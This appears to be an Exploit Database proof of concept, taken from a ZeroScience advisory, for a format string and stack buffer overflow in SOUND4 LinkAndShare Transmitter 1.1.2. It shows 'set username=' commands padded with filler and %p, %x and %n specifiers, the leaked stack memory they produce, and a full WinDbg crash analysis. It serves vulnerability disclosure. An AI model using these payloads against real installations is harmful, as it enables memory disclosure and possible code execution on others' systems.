SOUND4 LinkAndShare Transmitter 1.1.2 – Format String Stack Buffer Overflow

• Exploit Database
• 111 阅读

• 作者： LiquidWorm
  日期： 2023-04-05
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51259/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331

  # Exploit Title: SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow # Exploit Author: LiquidWorm     Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: 1.1.2   Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that allow users to remotely control SOUND4 processors through a network connection. SOUND4 offers a tool that manage sending L&S commands to your processors: the Link&Share Transmitter.   Desc: The application suffers from a format string memory leak and stack buffer overflow vulnerability because it fails to properly sanitize user supplied input when calling the getenv() function from MSVCR120.DLL resulting in a crash overflowing the memory stack and leaking sensitive information. The attacker can abuse the username environment variable to trigger and potentially execute code on the affected system.   --------------------------------------------------------------------------- (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29int 29h ---------------------------------------------------------------------------   Tested on: Microsoft Windows 10 Home     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience     Advisory ID: ZSL-2023-5744 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php     26.09.2022   --     C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe   C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file 02/02/23 17:06:19 : Background launch: User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd00000000013872CB0000000A012FF644776BE9250200000277666A78C60003C50000000077651CFC00000000012FF8B07770C59F0138F9D832EC2962011AE00000000000011B100000000001FFFFFC3E012FF814776A7252776A8D3B32EC29C60138000000000440012FF8B00138F0EC013889420000000001386DB000000006000000003B00003B00001000000000060000000301380294013800000200000200000000C60003C57769517C000000000000000100000000012FF764012FF75877694F2600FC000000FC0000012FF79800000008000003010000033C000000010139CF800000000000000087FFFFFCC40000000000000000000001F4013800010010002F00000001000000010000000002020002536E6957206B636F00302E3201380000012FF76400000000000007FF000003C5013800C0013899A4FFFFFFFE012FF7CC00000000000000000138CD100000008900000001000000000000033C012FF7CC000003450000000077694D110138C148000004480138CD10012FF800013800C001380000002C000200000001010001000000033C0139CF78012FF788000002BC0139CF780139CF8044B51122000000000000000000000AF00000000077694A9C770100BA01389918002FF8883B00003B000000000000033C013899180139CF7F00000000012FF7E0012FFB64776DAE6044B517CAFFFFFFFE012FF8A8776A6F0C00000440012FF9CC776A7252776A8D3B6E75521E676E696E00000200012FFA680138CD10012FF8687769470000000000012FF888776610783B00003B776D2D2C00000448FFFFFFFF00EC8D180000000002000002000000003F00033C00000003FFFFFFFF0000000000EC8D180139CF80002C0000000004400000000000EC8D180138000000EB0000000002BF000002FA0000510A32EC00000139D3C0013800000000000000EC8D18229F00000138898C0000002000000001012FFB103B00003BD1B0FD8E0000000000ECB3AC61636F6C736F686C0138007400051000000000090000000F34303033013800000138999000630069000000040000000F000000000069006400000080006F0056000000000000000F013927F8000002BC0000033C006100720000002F0000002F0065000000200073013800C00139D3C0000000000000000F010001000000004200000001006E0069000000000000000F0139D300013803AC000000010138C148000000000000000F000000000001007401389918013800C03B00003B0139D3C8000000000101991800000000013800C0006E00610000033C013A78A044B50000FFFFFF0000000AF0000000350000003F01389918010103AC000002BC0000002000260007012FFA88013AB160012FFA80776A634F0000004F00000B4000000B4F01380000776E7BC40139D3C80000002000180017012FFAB801392504012FFAB0776A634F00000051000000200000000E01380000012FFA44012FFA8C01399FE8012FFA5432EC2BEA0000003C776C4EB00139FE0C000000400000000E00ECA7300000000D000000000139FE10012FFA9067F0C042012FFA8867EEEE0C67fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     ---     C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe   (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29int 29h 0:000> kb # ChildEBP RetAddrArgs to Child 00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85] 02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96] 03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690] 04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138] *** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe *** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe 05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190] WARNING: Stack unwind information not available. Following frames may be wrong. 06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f 08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed 0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f 0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> !analyze -v ******************************************************************************* * * *Exception Analysis * * * *******************************************************************************   GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 645046b1 cd29int 29h   EXCEPTION_RECORD:(.exr -1) ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e) ExceptionCode: c0000409 (Security check failure or stack buffer overrun) ExceptionFlags: 00000001 NumberParameters: 1 Parameter[0]: 00000005 Subcode: 0x5 FAST_FAIL_INVALID_ARG   FAULTING_THREAD:000059e8 DEFAULT_BUCKET_ID:FAIL_FAST_INVALID_ARG PROCESS_NAME:LinkAndShareTransmitter.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE_STR:c0000409 EXCEPTION_PARAMETER1:00000005 WATSON_BKT_PROCSTAMP:6144495e WATSON_BKT_PROCVER:1.1.0.2 PROCESS_VER_PRODUCT:Sound4 Link&Share Transmitter WATSON_BKT_MODULE:MSVCR120.dll WATSON_BKT_MODSTAMP:577e0f1e WATSON_BKT_MODOFFSET:a46b1 WATSON_BKT_MODVER:12.0.40660.0 MODULE_VER_PRODUCT:Microsoft® Visual Studio® 2013 BUILD_VERSION_STRING:10.0.19041.2364 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH:938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5 MODLIST_SHA1_HASH:5990094944fb37a3f4c159affa51a53b6a58ac20 NTGLOBALFLAG:70 APPLICATION_VERIFIER_FLAGS:0 PRODUCT_TYPE:1 SUITE_MASK:784 DUMP_TYPE:fe ANALYSIS_SESSION_HOST:LAB17 ANALYSIS_SESSION_TIME:01-29-2023 16:09:48.0143 ANALYSIS_VERSION: 10.0.16299.91 x86fre THREAD_ATTRIBUTES: OS_LOCALE:ENU   PROBLEM_CLASSES:   ID: [0n270] Type: [FAIL_FAST] Class:Primary Scope:DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID:[Unspecified] TID:[Unspecified] Frame:[0]   ID: [0n257] Type: [INVALID_ARG] Class:Addendum Scope:DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID:[Unspecified] TID:[Unspecified] Frame:[0]   BUGCHECK_STR:FAIL_FAST_INVALID_ARG PRIMARY_PROBLEM_CLASS:FAIL_FAST LAST_CONTROL_TRANSFER:from 64504677 to 645046b1   STACK_TEXT: 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 WARNING: Stack unwind information not available. Following frames may be wrong. 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b   STACK_COMMAND:~0s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC:0b8f8316052b30cae637e16edbb425a676500e95 THREAD_SHA1_HASH_MOD_FUNC_OFFSET:359d5607a5627480201647a1bc659e9d2ac9281f THREAD_SHA1_HASH_MOD:2418d74468f3882fef267f455cd32d7651645882   FOLLOWUP_IP: MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 645046b1 cd29int 29h   FAULT_INSTR_CODE:6a5629cd FAULTING_SOURCE_LINE:f:\dd\vctools\crt\crtw32\misc\invarg.c FAULTING_SOURCE_FILE:f:\dd\vctools\crt\crtw32\misc\invarg.c FAULTING_SOURCE_LINE_NUMBER:132 SYMBOL_STACK_INDEX:0 SYMBOL_NAME:MSVCR120!_invoke_watson+e FOLLOWUP_NAME:MachineOwner MODULE_NAME: MSVCR120 IMAGE_NAME:MSVCR120.dll DEBUG_FLR_IMAGE_TIMESTAMP:577e0f1e BUCKET_ID:FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e FAILURE_EXCEPTION_CODE:c0000409 FAILURE_IMAGE_NAME:MSVCR120.dll BUCKET_ID_IMAGE_STR:MSVCR120.dll FAILURE_MODULE_NAME:MSVCR120 BUCKET_ID_MODULE_STR:MSVCR120 FAILURE_FUNCTION_NAME:_invoke_watson BUCKET_ID_FUNCTION_STR:_invoke_watson BUCKET_ID_OFFSET:e BUCKET_ID_MODTIMEDATESTAMP:577e0f1e BUCKET_ID_MODCHECKSUM:f8aef BUCKET_ID_MODVER_STR:12.0.40660.0 BUCKET_ID_PREFIX_STR:FAIL_FAST_INVALID_ARG_ FAILURE_PROBLEM_CLASS:FAIL_FAST FAILURE_SYMBOL_NAME:MSVCR120.dll!_invoke_watson FAILURE_BUCKET_ID:FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson WATSON_STAGEONE_URL:http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1 TARGET_TIME:2023-01-29T15:09:52.000Z OSBUILD:19044 OSSERVICEPACK:2364 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE:x86 OSNAME:Windows 10 OSEDITION:Windows 10 WinNt SingleUserTS Personal USER_LCID:0 OSBUILD_TIMESTAMP:2008-01-07 11:33:18 BUILDDATESTAMP_STR:160101.0800 BUILDLAB_STR:WinBuild BUILDOSVER_STR:10.0.19041.2364 ANALYSIS_SESSION_ELAPSED_TIME:635d ANALYSIS_SOURCE:UM FAILURE_ID_HASH_STRING:um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson FAILURE_ID_HASH:{c9fee478-4ed1-0d2b-ddd7-dca655d9817f}   Followup: MachineOwner ---------   0:000> d MSVCP120 70fb00004d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00MZ.............. 70fb0010b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00........@....... 70fb002000 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................ 70fb003000 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00................ 70fb00400e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68........!..L.!Th 70fb005069 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6fis program canno 70fb006074 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20t be run in DOS 70fb00706d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00mode....$....... 0:000> lmvm MSVCR120 Browse full module list startendmodule name 64460000 6454e000 MSVCR120 (private pdb symbols)C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll Image name: MSVCR120.dll Browse all global symbolsfunctionsdata Timestamp:Thu Jul7 10:13:18 2016 (577E0F1E) CheckSum: 000F8AEF ImageSize:000EE000 File version: 12.0.40660.0 Product version:12.0.40660.0 File flags: 0 (Mask 3F) File OS:4 Unknown Win32 File type:2.0 Dll File date:00000000.00000000 Translations: 0409.04b0 CompanyName:Microsoft Corporation ProductName:Microsoft® Visual Studio® 2013 InternalName: msvcr120.dll OriginalFilename: msvcr120.dll ProductVersion: 12.00.40660.0 FileVersion:12.00.40660.0 built by: VSULDR FileDescription:Microsoft® C Runtime Library LegalCopyright: © Microsoft Corporation. All rights reserved. 0:000> x /D /f MSVCR120!getenv MSVCR120!getenv (char *) 0:000> x /D /f MSVCR120!getenv 64477785MSVCR120!getenv (char *) .. 0:000> u 64477785 MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: 64477785 6a0cpush0Ch 64477787 68f0774764pushoffset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) 6447778c e8ea75ffffcallMSVCR120!__SEH_prolog4 (6446ed7b) 64477791 8365e400and dword ptr [ebp-1Ch],0 64477795 33c0xor eax,eax 64477797 8b7508mov esi,dword ptr [ebp+8] 6447779a 85f6testesi,esi 6447779c 0f95c0setne al 0:000> r eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29int 29h 0:000> u 645046b1 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]: 645046b1 cd29int 29h 645046b3 56pushesi 645046b4 6a01push1 645046b6 be170400c0mov esi,0C0000417h 645046bb 56pushesi 645046bc 6a02push2 645046be e85efeffffcallMSVCR120!_call_reportfault (64504521) 645046c3 56pushesi 0:000> u 64477785 MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: 64477785 6a0cpush0Ch 64477787 68f0774764pushoffset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) 6447778c e8ea75ffffcallMSVCR120!__SEH_prolog4 (6446ed7b) 64477791 8365e400and dword ptr [ebp-1Ch],0 64477795 33c0xor eax,eax 64477797 8b7508mov esi,dword ptr [ebp+8] 6447779a 85f6testesi,esi 6447779c 0f95c0setne al 0:000> g WARNING: Continuing a non-continuable exception (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29int 29h     ---     C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe   C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file 02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b. .1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA